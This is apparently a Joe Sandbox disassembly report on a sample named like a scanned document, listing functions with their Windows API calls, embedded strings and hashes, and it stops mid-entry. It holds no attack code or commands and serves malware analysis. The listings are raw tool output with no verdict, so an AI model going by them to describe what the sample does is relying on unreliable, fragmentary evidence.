CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0087082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00870837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0087083C

Strings

SOFTWARE\Classes\, xrefs: 0087070E
\CLSID, xrefs: 00870724
\IPC$, xrefs: 00870784

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 5943c65b59586971bee84414ae287796e4ad57971f0ee8da5d359cac70b428e4
Instruction ID: 06b48684e2932b48cd275e172a384aad5f79c24f921fcfff9b24997d56e6e921
Opcode Fuzzy Hash: 5943c65b59586971bee84414ae287796e4ad57971f0ee8da5d359cac70b428e4
Instruction Fuzzy Hash: B441D672C10229EBDB15EBA4DC958EEB778FF04350F05412AE915E3261EB30AE44CF91

Function 00893C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00893C5C
CoInitialize.OLE32(00000000), ref: 00893C8A
CoUninitialize.OLE32 ref: 00893C94
_wcslen.LIBCMT ref: 00893D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00893DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00893ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00893F0E
CoGetObject.OLE32(?,00000000,008AFB98,?), ref: 00893F2D
SetErrorMode.KERNEL32(00000000), ref: 00893F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00893FC4
VariantClear.OLEAUT32(?), ref: 00893FD8

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 560ac5782b6b194425a613bbb4a1ff12b2fad6d10adefcfa81c44212004845e8
Instruction ID: 211a34ea043c4215c0ed0806dd89c7d28c97fc62c2e837b74cb3087254424920
Opcode Fuzzy Hash: 560ac5782b6b194425a613bbb4a1ff12b2fad6d10adefcfa81c44212004845e8
Instruction Fuzzy Hash: 9DC12571608205AFDB00EF68C88496BB7E9FF89748F14491DF98ADB211DB31EE45CB52

Function 00887A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00887AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00887B8F
SHGetDesktopFolder.SHELL32(?), ref: 00887BA3
CoCreateInstance.OLE32(008AFD08,00000000,00000001,008D6E6C,?), ref: 00887BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00887C74
CoTaskMemFree.OLE32(?,?), ref: 00887CCC
SHBrowseForFolderW.SHELL32(?), ref: 00887D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00887D7A
CoTaskMemFree.OLE32(00000000), ref: 00887D81
CoTaskMemFree.OLE32(00000000), ref: 00887DD6
CoUninitialize.OLE32 ref: 00887DDC

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: f04595deeb0dffd3338f165170f33ff312f7c641ef62cd38226e2104406933f3
Instruction ID: a330f53fe3de4bc1803b27aba4dd33442d5dbc29d4f30680b1da193e3296db80
Opcode Fuzzy Hash: f04595deeb0dffd3338f165170f33ff312f7c641ef62cd38226e2104406933f3
Instruction Fuzzy Hash: C3C12C75A04109AFDB14DFA4C884DAEBBF9FF48314B1484A9E819DB761D730ED41CB90

Function 008A541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 008A5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008A5515
CharNextW.USER32(00000158), ref: 008A5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 008A5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 008A559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008A55AC

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 42798054cd3c043234fc8232e33f53841524dbbf2b11a79c04b76518f568d986
Instruction ID: b7b3f8d02d75b75127416e6791c2ad16cfcc81d21fd79cd6dd9473ef03b28e71
Opcode Fuzzy Hash: 42798054cd3c043234fc8232e33f53841524dbbf2b11a79c04b76518f568d986
Instruction Fuzzy Hash: CF619B71901A08EBEF10CF54DC849FE7BB9FB0B724F144149F925EAA90D7748A80DB61

Function 0086FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0086FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0086FB08
VariantInit.OLEAUT32(?), ref: 0086FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0086FB3A
VariantCopy.OLEAUT32(?,?), ref: 0086FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0086FBA1
VariantClear.OLEAUT32(?), ref: 0086FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0086FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0086FBCC
VariantClear.OLEAUT32(?), ref: 0086FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0086FBE9

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: a61c353833d0b558378ce8a91857c16507bc675921c93a94b2ba1169f6728a87
Instruction ID: 38057d97637906d8355e2026385f6da75c283806a9f443059983249868d020cd
Opcode Fuzzy Hash: a61c353833d0b558378ce8a91857c16507bc675921c93a94b2ba1169f6728a87
Instruction Fuzzy Hash: C2416235A002199FDB00DF68E8549EDBBB9FF09354F018069E945E7261CB30E945CF95

Function 0089055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 008905BC
inet_addr.WSOCK32(?), ref: 0089061C
gethostbyname.WSOCK32(?), ref: 00890628
IcmpCreateFile.IPHLPAPI ref: 00890636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008906C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008906E5
IcmpCloseHandle.IPHLPAPI(?), ref: 008907B9
WSACleanup.WSOCK32 ref: 008907BF

Strings

Ping, xrefs: 00890676

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 227582ed6ded7505728cc748ab58ed295c63e4e6174369deff408513b524c6c3
Instruction ID: 5e10986b997a712b75b5f7ba118d1f46583b4a79149294c810b8d7481ed8e8d7
Opcode Fuzzy Hash: 227582ed6ded7505728cc748ab58ed295c63e4e6174369deff408513b524c6c3
Instruction Fuzzy Hash: F9917F35604201AFD710DF19D488B16BBE4FF44328F1985A9F469DB6A2C731ED85CF92

Function 00898CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00898CF3

Part of subcall function 00878E54: _wcslen.LIBCMT ref: 00878E77

_wcslen.LIBCMT ref: 00898D4E
_wcslen.LIBCMT ref: 00898D9C
_wcslen.LIBCMT ref: 00898DDC
_wcslen.LIBCMT ref: 00898E6E

Strings

winapi, xrefs: 00898D96, 00898D9B
cdecl, xrefs: 00898D48, 00898D4D
stdcall, xrefs: 00898DD6, 00898DDB
none, xrefs: 00898E65, 00898E6A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: f1d6fcc52421c3cb5bc9d9e893564319bce66e1d20c90bc123e0c4f3daf80aef
Instruction ID: 8cacf5986f209b7782412fa18878f91d9053fdb37cd4985cfc456a7184b058d7
Opcode Fuzzy Hash: f1d6fcc52421c3cb5bc9d9e893564319bce66e1d20c90bc123e0c4f3daf80aef
Instruction Fuzzy Hash: C1519E31A00117DBCF14EFACC9509BEB7A5FF66324B294229E966E7284EB35DD40C790

Function 0089372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00893774
CoUninitialize.OLE32 ref: 0089377F
CoCreateInstance.OLE32(?,00000000,00000017,008AFB78,?), ref: 008937D9
IIDFromString.OLE32(?,?), ref: 0089384C
VariantInit.OLEAUT32(?), ref: 008938E4
VariantClear.OLEAUT32(?), ref: 00893936

Strings

NULL Pointer assignment, xrefs: 0089381E
Failed to create object, xrefs: 008937E4, 0089389A
Invalid parameter, xrefs: 00893865

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: c5ef98ed1b89a6a20d99599e79157279a1e44ae1fc3cf067a455f989953243e0
Instruction ID: 5679e8fc4665ab9fdfc9ef35c66806b5cc48315b1f081cda2849229d6e8106ba
Opcode Fuzzy Hash: c5ef98ed1b89a6a20d99599e79157279a1e44ae1fc3cf067a455f989953243e0
Instruction Fuzzy Hash: C9619F70608311AFD710EF54C848B6ABBE8FF49714F144929F995EB291D770EE48CB92

Function 00883388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 008833CF

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008833F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00883504
Line %d (File "%s"):, xrefs: 00883443, 0088345C
^ ERROR , xrefs: 0088349E
"%s" (%d) : ==> %s:, xrefs: 00883522
Error: , xrefs: 008834D1
Incorrect parameters to object property !, xrefs: 008834AB

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: ca236c50f8aedbbef93936d41af5473525fd01c39388f039fd9e455fdaafef23
Instruction ID: 74bb861e58a51ac85ed075dd4147617eb390274967bb702c0b95d26f2365a1f4
Opcode Fuzzy Hash: ca236c50f8aedbbef93936d41af5473525fd01c39388f039fd9e455fdaafef23
Instruction Fuzzy Hash: A9518A71800209AADF14EBA4DD46EEEB778FF04740F104166F515F22A2EB356F98DB62

Function 0087B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0087B5FC
_wcslen.LIBCMT ref: 0087B608
_wcslen.LIBCMT ref: 0087B64D
_wcslen.LIBCMT ref: 0087B68C
_wcslen.LIBCMT ref: 0087B6C7

Strings

APPEND, xrefs: 0087B6C1, 0087B6C6
EXISTS, xrefs: 0087B686, 0087B68B
KEYS, xrefs: 0087B647, 0087B64C
REMOVE, xrefs: 0087B602, 0087B607

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: faf38e021d33cfd6919ab23b0586c707a4909ec878e04c0edf65e44f4043f589
Instruction ID: 6181028bc26b588207e668c775808f23624601e8eda098095a5e8b8d979c6e9a
Opcode Fuzzy Hash: faf38e021d33cfd6919ab23b0586c707a4909ec878e04c0edf65e44f4043f589
Instruction Fuzzy Hash: 9441DE32A000269BCB105F7DC8906BE77A6FFB1754B248229E629D7288F735CD81C790

Function 00885393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008853A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00885416
GetLastError.KERNEL32 ref: 00885420
SetErrorMode.KERNEL32(00000000,READY), ref: 008854A7

Strings

UNKNOWN, xrefs: 00885444
INVALID, xrefs: 00885459
READY, xrefs: 00885460, 00885468
READONLY, xrefs: 00885452
NOTREADY, xrefs: 0088544B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 720a9dee1ebf921fef32b93c2194d14f7ee4d28d522eece762b3afc70c6812fd
Instruction ID: ae3b272595fb2339e9dab5c83b74453055f6126cf19bed5986d7382cee417099
Opcode Fuzzy Hash: 720a9dee1ebf921fef32b93c2194d14f7ee4d28d522eece762b3afc70c6812fd
Instruction Fuzzy Hash: 5431A3B5A006089FD710EF68C484AAA7BF4FF45305F148069E505DB392EB71ED86CB91

Function 008A3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 008A3C79
SetMenu.USER32(?,00000000), ref: 008A3C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008A3D10
IsMenu.USER32(?), ref: 008A3D24
CreatePopupMenu.USER32 ref: 008A3D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008A3D5B
DrawMenuBar.USER32 ref: 008A3D63

Strings

F, xrefs: 008A3D4E
0, xrefs: 008A3C54

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 9748f50de1885d48193ac8de7a6b876db4018e24046bde072cb8886e12420386
Instruction ID: 8934534bb893224dbcd9a5716ee9b96ec8a4780c5d42d307bd3566f62f6a9625
Opcode Fuzzy Hash: 9748f50de1885d48193ac8de7a6b876db4018e24046bde072cb8886e12420386
Instruction Fuzzy Hash: BF413875A01209EFEB14DF64D884BAABBB5FF4A350F140029F946E7760D770AA10CB94

Function 008A3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008A3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008A3AA0
GetWindowLongW.USER32(?,000000F0), ref: 008A3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008A3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008A3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 008A3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 008A3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 008A3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 008A3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 008A3C13

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: e87a7c5dc48afd9c1b2ea62dd430c42132247719934b456ab602517a539b56d6
Instruction ID: 49961f6a216c592fbf1d2016c2e659c77397034f04155e69615c5b85a574a6c8
Opcode Fuzzy Hash: e87a7c5dc48afd9c1b2ea62dd430c42132247719934b456ab602517a539b56d6
Instruction Fuzzy Hash: 45617D75900248AFEB11DF68CC85EEE77B8FB0A710F100059FA15E7291C774AE41DB60

Function 0087B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0087B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0087A1E1,?,00000001), ref: 0087B165
GetWindowThreadProcessId.USER32(00000000), ref: 0087B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0087A1E1,?,00000001), ref: 0087B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0087B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0087A1E1,?,00000001), ref: 0087B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0087A1E1,?,00000001), ref: 0087B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0087A1E1,?,00000001), ref: 0087B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0087A1E1,?,00000001), ref: 0087B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0087A1E1,?,00000001), ref: 0087B21D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 5bd7c2ca15d11edb4ee946de560ef9a0ef3a7681d843fbd7f006f13342c300cf
Instruction ID: 3938c800c6f57659c36ff11748ea7c8fe60fa675735c36fd04b2ad935c79143f
Opcode Fuzzy Hash: 5bd7c2ca15d11edb4ee946de560ef9a0ef3a7681d843fbd7f006f13342c300cf
Instruction Fuzzy Hash: 0C3191B5510608BFEB10DF64DC88B6D7BAAFB62325F108419FA09DB191D7B4DE408F64

Function 00842C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00842C94

Part of subcall function 008429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0084D7D1,00000000,00000000,00000000,00000000,?,0084D7F8,00000000,00000007,00000000,?,0084DBF5,00000000), ref: 008429DE
Part of subcall function 008429C8: GetLastError.KERNEL32(00000000,?,0084D7D1,00000000,00000000,00000000,00000000,?,0084D7F8,00000000,00000007,00000000,?,0084DBF5,00000000,00000000), ref: 008429F0

_free.LIBCMT ref: 00842CA0
_free.LIBCMT ref: 00842CAB
_free.LIBCMT ref: 00842CB6
_free.LIBCMT ref: 00842CC1
_free.LIBCMT ref: 00842CCC
_free.LIBCMT ref: 00842CD7
_free.LIBCMT ref: 00842CE2
_free.LIBCMT ref: 00842CED
_free.LIBCMT ref: 00842CFB

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e091495acf67c7c18493d1ae598793bc3d8629afc1a9fc49b670b672c78346a0
Instruction ID: 6df76ff7bd89801dea2a454fba054351cc33ae4fe019166598b3a23d4eae4b4d
Opcode Fuzzy Hash: e091495acf67c7c18493d1ae598793bc3d8629afc1a9fc49b670b672c78346a0
